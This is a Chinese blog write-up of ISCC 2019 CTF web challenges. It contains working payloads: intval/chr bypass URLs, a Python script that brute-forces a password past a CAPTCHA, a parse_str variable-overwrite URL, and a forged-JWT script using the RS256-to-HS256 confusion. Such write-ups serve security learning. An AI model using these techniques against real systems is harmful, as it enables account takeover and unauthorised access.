ISCC2019Writeup

最新推荐文章于 2022-11-30 08:00:44 发布
最新推荐文章于 2022-11-30 08:00:44 发布
阅读量737 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43536759/article/details/106785180
版权

web1

源码如下

<?php
error_reporting(0);  
require 'flag.php';
$value = $_GET['value'];
$password = $_GET['password'];
$username = '';

for ($i = 0; $i < count($value); ++$i) {
    if ($value[$i] > 32 && $value[$i] < 127) unset($value);
    else $username .= chr($value[$i]);
    if ($username == 'w3lc0me_To_ISCC2019' && intval($password) < 2333 && intval($password + 1) > 2333) {
        echo 'Hello '.$username.'!', '<br>', PHP_EOL;
        echo $flag, '<hr>';
    }
}

highlight_file(__FILE__);

关键代码

if ($value[$i] > 32 && $value[$i] < 127) unset($value);
    else $username .= chr($value[$i]);
    if ($username == 'w3lc0me_To_ISCC2019' && intval($password) < 2333 && intval($password + 1) > 2333) {
        echo 'Hello '.$username.'!', '<br>', PHP_EOL;
        echo $flag, '<hr>';
    }

查php手册资料得知chr()函数是 值除以256取余数,这里我们需要自己数组来chr()为w3lc0me_To_ISCC2019
1.chr为自动取模256,所以我们我们可以在原来数值加上256的倍数
2.intval()在处理16进制存在问题时存在漏洞,即当intval(字符串)为0,但是intval(字符串+1)会自动转换成数值的(php7里面修复了这个东西)

var_dump(intval('0x2'))          //int(0)字符串形式输入  
var_dump(intval('0xa'+1))        //int(11)数值形式输入

3.intval()在处理科学计数法时同处理十六进制一样的原理(不知道修复了没有),所以也可以用科学计数法绕过intval()函数。

var_dump(intval('2e2'))          //int(2)字符串形式输入  
var_dump(intval('2e2'+1))        //int(201)数值形式输入

4.intval()也可以用$password=’2332.99999999999999999999’来绕过,无法绕过时,继续增加9的数量,直到可以绕过为止。
5.intal()不能用八进制,十进制绕过

所以我们可以构造payload

http://39.100.83.188:8001/?value[]=0x177&value[]=307&value[]=364&value[]=355&value[]=304&value[]=365&value[]=357&value[]=351&value[]=340&value[]=367&value[]=351&value[]=329&value[]=339&value[]=323&value[]=323&value[]=306&value[]=304&value[]=305&value[]=313&password=2e4

web2

知识点:暴力破解 验证码绕过

1.我们先讲一下验证码机制原理,验证码在后端被绘制好后会将生成的字符串保存在session中,当客户端输入验证码完毕后,会提交到后端与session比较。
2.本题中有个漏洞是,如果没有向服务器请求验证码,就不产生session,不带上cookie访问的话,那么验证码就形同虚设,而且密码是三位数字,所以可以进行暴力破解。
3.可以用burp抓包暴力破解,注意的是要把请求头的Cookie去掉。
4.也可以用Python脚本:

import requests

# session = requests.Session()

for i in range(1, 999):
    password = str(i)
    if len(password) == 1:
        password = '00' + password
    elif len(password) == 2:
        password = '0' + password

    r = requests.post("http://39.100.83.188:8002/login.php", data = {'username': 'admin', 'pwd': password, 'Login': 'submit'})
    r.encoding = 'unicode'
    print(password + ' ' + r.text)
    if r.text != '密码错误':
        break

web4

知识点:代码审计,函数使用不当,变量覆盖

源码:

<?php 
error_reporting(0); 
include("flag.php"); 
$hashed_key = 'ddbafb4eb89e218701472d3f6c087fdf7119dfdd560f9d1fcbe7482b0feea05a'; 
$parsed = parse_url($_SERVER['REQUEST_URI']); 
if(isset($parsed["query"])){ 
    $query = $parsed["query"]; 
    $parsed_query = parse_str($query); 
    if($parsed_query!=NULL){ 
        $action = $parsed_query['action']; 
    } 

    if($action==="auth"){ 
        $key = $_GET["key"]; 
        $hashed_input = hash('sha256', $key); 
        if($hashed_input!==$hashed_key){ 
            die("<img src='cxk.jpg'>"); 
        } 

        echo $flag; 
    } 
}else{ 
    show_source(__FILE__); 
}?>

1.parse_str存在变量覆盖漏洞,从URL得到的查询字符串,会被解析为变量并设置到当前作用域。
2.所以我们将hashed_key覆盖为我们想要的值即可,sha256(“glzjin”)=b262138fc423f9f944a3161a28e3e7e3a1e779c39c5240f0399f923053e6e371,payload 如下:

/?action=auth&key=glzjin&hashed_key=b262138fc423f9f944a3161a28e3e7e3a1e779c39c5240f0399f923053e6e371

web5

web6

知识点:代码泄露,JWT原理

1.抓包可以找到Authorization,所以应该是考察JWT。
2.可以直接到https://jwt.io/ 解码。本题可以直接在这个网页得到公钥,不过也可以查看网页源码看到/static/js/common.js,

最后有一段

function getpubkey(){
    /* 
    get the pubkey for test
    /pubkey/{md5(username+password)}
    */
}`

这里有得到公钥的另一个方法。
3.我们尝试更改alg所指的算法,将其从RS256这种非对称加密改成HS256这种对称加密,这样我们有公钥就可以伪造JET Token从而而所欲为了。
4.用得到的公钥写Python脚本来伪造令牌。(这里jwt如果用最新版本的模块会报错)

#!/usr/bin/env python
import jwt
import base64

public = "-----BEGIN PUBLIC KEY-----\nMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDMRTzM9ujkHmh42aXG0aHZk/PK\nomh6laVF+c3+D+klIjXglj7+/wxnztnhyOZpYxdtk7FfpHa3Xh4Pkpd5VivwOu1h\nKk3XQYZeMHov4kW0yuS+5RpFV1Q2gm/NWGY52EaQmpCNFQbGNigZhu95R2OoMtuc\nIC+LX+9V/mpyKe9R3wIDAQAB\n-----END PUBLIC KEY-----"

print(jwt.encode({"name": "fangjun","priv": "admin"}, key=public, algorithm='HS256'))

5.得到的JWT Token可以抓包修改Authorization头,也可以直接按F12在本地储存(LocalStorage)中修改token的值然后可以得到我们想要的东西。
6.然后访问/text/admin:22f1e0aa7a31422ad63480aa27711277。
7.得到flag。
参考链接
https://www.anquanke.com/post/id/145540#h2-11
https://www.cnblogs.com/dliv3/p/7450057.html#%E9%99%84-%E7%9B%B8%E5%85%B3%E5%B7%A5%E5%85%B7
https://blog.csdn.net/weixin_34357267/article/details/87578554
https://xz.aliyun.com/t/2338

火 柴 人
关注
ISCC 2019 部分 Writeup
zhy_27的博客
05-25 9453
ISCC 2019 WriteupMisc1. 隐藏的信息(50)2. Welcome(100)3. 倒立屋(100)4. 无法运行的exe(150)5. 他们能在一起吗?(200)6. Keyes' secret(200)7. Aesop's secret(300)8. 碎纸机(400)Reverse1. answer to everything(100)2. dig dig dig(200)3...
Solve Me解题记录
0verWatch的博客
08-14 3838
前言 前一阵子关注点在实战上,现在又回归CTF学习套路了,这个网站本来做了一半的题目,今天终于把他补完了,学到了炒鸡多的东西啊~ 正文 Warm up 给出来一个密文和一段代码 1wMDEyY2U2YTY0M2NgMTEyZDQyMjAzNWczYjZgMWI4NTt3YWxmY= &amp;amp;amp;lt;?php error_reporting(0); require __D...
web1 ISCC
沐目的博客
05-31 294
打开连接,又是审计, <?php error_reporting(0); require 'flag.php'; $value = $_GET['value']; $password = $_GET['password']; $username = ''; for ($i = 0; $i < count($value); ++$i) { if ($value[$i] >...
iscc2019
wuerror的博客
06-05 1023
iscc2019 misc welcome 加上后缀zip,打开将“蓅烺計劃 洮蓠朩暒”替换为0,“戶囗 萇條”替换为1。得到二进制串01100110011011000110000101100111011110110100100101010011010000110100001101011111010101110100010101001100010000110100111101001101010...
WgpSec(狼组安全) CTF PHPCode题目记录
e6678的博客
03-23 1596
PHPCode strcmp 题目描述 <?php include("flag.php"); highlight_file(__FILE__); if (isset($_GET['a'])) { if (strcmp($_GET['a'], $flag) == 0) //如果 str1 小于 str2 返回 < 0; 如果 str1大于 str2返回 > 0;如果两者相等,返回 0。 //比较两个字符串(区分大小写) die('Flag:
CTFshow——web入门——php特性(下篇)
h_adam的博客
02-06 6237
web入门——php特性web123web125web126 web123 题目 <?php error_reporting(0); highlight_file(__FILE__); include("flag.php"); $a=$_SERVER['argv']; $c=$_POST['fun']; if(isset($_POST['CTF_SHOW'])&&isset($_POST['CTF_SHOW.COM'])&&!isset($_GET['fl0g']))
intval的绕过和chr的利用
https://www.cnblogs.com/zpchcbd/
05-02 3815
题目 <?php error_reporting(0); $flag = 'OKOKOKOK' //老样子 自定义一个flag $value = $_GET['value']; //接受value参数 $password = $_GET['password']; //接受get参数 $username = ''; for ($i = 0; $i < count($value);...
ISCC2015 Writeup BASIC - Q7.docx
09-30
ISCC2015 Writeup BASIC - Q7.docx
ISCC2015 Writeup REVERSE - Q7.docx
09-30
逆向工程挑战 ISCC2015 Writeup REVERSE - Q7.docx 本文档总结了 ISCC2015 Writeup REVERSE - Q7.docx 中的逆向工程挑战题目,涉及到多种逆向工程技术和算法,包括 DLL 文件分析、APK 文件修复、DES 解密、AES 解密...
ISCC2015 Writeup MISC - Q7.docx
09-30
ISCC2015 Writeup MISC - Q7.docx
2019ISCC writeup(相对简单)-b64_c3VuJTIwYm95-it720.docx
11-29
CTF安全大赛必刷题
ISCC2019个人挑战赛题目练习
05-05
为了让大家能够拿到题目练习,增强网络安全技术和大赛经验的积累,可以下载这些题目来练习。解题思路在我的博客。
[Java代码审计]javacon WriteUp
Y4tacker的博客
07-21 1032
文章目录写在前面javacon 写在前面 在P神星球看到的,这里学习一下,文件在https://www.leavesongs.com/media/attachment/2018/11/23/challenge-0.0.1-SNAPSHOT.jar javacon 运行的时候利用java -jar challenge-0.0.1-SNAPSHOT.jar 首先查看配置 首先在登录页面,在login页面post接收参数,与配置当中的比对,成功则设置cookie @PostMapping({"/login"})
Java代码审计5期优秀学员作业选登
Ms08067安全实验室
11-30 207
文章来源 | MS08067Java代码审计5期作业本文作者:River作业1需求1增加的代码(BankCustomer.java)(注释中区分了为了解决此需求而增加的代码)importjava.text.SimpleDateFormat; importjava.util.Date; publicclassBankCustomerextendsBankCardimplements...
Bugku旧平台misc writeup
a370793934的专栏
11-27 4604
流量分析 flag被盗 打开搜索flag字符串 flag{This_is_a_f10g} 中国菜刀 搜索flag发现flag.tar.gz 找到疑似包到处分组字节流保存为1.gz,rar打开看到flag 或者用binwalk -e caidao.pcapng 分离出文件,改名1.tar.gz再打开 key{8769fe393f2b998fa6a11afe2bfcd65e} ...
CTF .git php代码审计 [Buy a lottery!]
baynk的博客
03-21 1052
Buy a lottery! 一个猜七色球游戏,玩一次20,对2个球赢5,3个球赢20,4个球赢300,7个球直接有了买flag的钱,这概率基本不可能,只要能中,明天就去买彩票。。。 先以为可能存在逻辑漏洞,审了半天也没发现有点啥。后来从头开始完成,在进行信息收集过程中扫到了以下信息。 接着去访问,得到一个关键信息.git。 .git不能直接访问,这是一个目录,但是可以通过工具把.git打包...
ctf日常学习记录(web)
qq_27396789的博客
01-11 6356
爆破1题目提示:flag就在某六位变量中。点开题目链接显示代码:<?php include "flag.php"; $a = @$_REQUEST['hello']; if(!preg_match('/^\w*$/',$a )){ die('ERROR'); } eval("var_dump($$a);"); show_source(__FILE__); ?>关键是这个东西var_dump($$
Writeup】Boston Key Party CTF 2015(部分题目)
热门推荐
企鹅学coding~
03-05 1万+
假期试着做了一下这场美国的CTF比赛,无奈题目看了一遍都没什么想法,只好等比赛结束再学习了。在这里总结一下通过此次比赛学到的姿势。 以下是六道php代码审计题目。 1.Prudential   I don‘t think that sha1 is broken. Prove me wrong. 代码如下: level1 <?php require 'flag.p
参加ISCC2019线下赛感悟
Lemon's blog
06-23 901
前言:第一次参加线下比赛,虽然是替补,但能够去看看就已经很兴奋了,也见到了很多大佬,真的学习了一波。 由于没有进入现场比赛,AWD模式也不太熟悉,不过有资源自己可以搭一个靶机玩玩,待到暑假好好玩玩,目前还是好好准备期末考试吧,还有就是smile大佬太牛逼了,要向大佬学习。 ...
iscc2015官方writeup
最新发布
09-06
iscc2015是国际信号与通信会议(International Symposium on Communication and Information Technologies)的官方writeup,在这个writeup中,主要回顾了iscc2015会议的主要内容和成果。 iscc2015会议是由IEEE(Institute of Electrical and Electronics Engineers)主办的,旨在聚集来自全球的学者、研究人员和专业人士,共同探讨和交流关于通信和信息技术领域的最新研究和发展。 这个writeup首先介绍了iscc2015会议的背景和目标,提及了该会议为促进学术界和工业界之间的合作、创新和知识交流所做的努力。接着,该writeup详细描述了iscc2015会议的主要议题,包括通信网络、无线通信、数据通信和网络安全等方面。此外,还列举了一些重要的研究课题和领域,如物联网、云计算、移动通信和多媒体通信等。 iscc2015的writeup还总结了会议期间的重要活动和成果。这些活动包括学术论文的研讨会和展示、专题演讲、研讨会和研究项目的发布等。会议期间,各个领域的专家和学者积极参与并互相交流了关于通信和信息技术领域的最新研究成果和创新理念。 最后,iscc2015的官方writeup总结了会议的收获和影响。该会议为全球通信和信息技术领域的研究人员和专业人士提供了一个交流和合作的平台,推动了相关领域的发展和创新。此外,与会者还从中获得了有关新技术、新方法和最佳实践的信息和经验。 总之,iscc2015官方writeup回顾了这个国际会议的主要内容和成果,强调了其在通信和信息技术领域的重要性和影响。通过促进学术界和工业界之间的交流与合作,这个会议为促进全球通信和信息技术领域的发展做出了贡献。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值